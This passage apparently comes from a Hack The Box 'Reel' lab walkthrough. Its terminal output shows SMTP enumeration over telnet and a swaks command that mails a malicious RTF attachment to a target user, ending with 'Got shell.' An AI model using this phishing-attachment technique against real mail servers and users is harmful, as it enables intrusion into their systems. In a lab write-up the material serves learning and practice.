➜ exploit telnet reel.htb.local 25
Trying 10.10.10.77...
Connected to reel.htb.local.
Escape character is '^]'.
220 Mail Service ready
HELO hi
250 Hello.
MAIL FROM: <hi@hello.com>
250 OK
RCPT TO: <nico@megabank.com>
250 OK
I'll use swaks to send the mail:
➜ exploit swaks --server 10.10.10.77 -f hey@htb.reel -t nico@megbank.com --attach hey.rtf
*** DEPRECATION WARNING: Inferring a filename from the argument to --attach will be removed in the
future. Prefix filenames with '@' instead.
=== Trying 10.10.10.77:25...
=== Connected to 10.10.10.77.
<- 220 Mail Service ready
-> EHLO kali
<- 250-REEL
<- 250-SIZE 20480000
<- 250-AUTH LOGIN PLAIN
<- 250 HELP
-> MAIL FROM:<hey@htb.reel>
<- 250 OK
-> RCPT TO:<nico@megbank.com>
<- 250 OK
-> DATA
<- 354 OK, send.
-> Date: Sat, 13 Jan 2024 17:56:54 +0530
-> To: nico@megbank.com
-> From: hey@htb.reel
Got shell.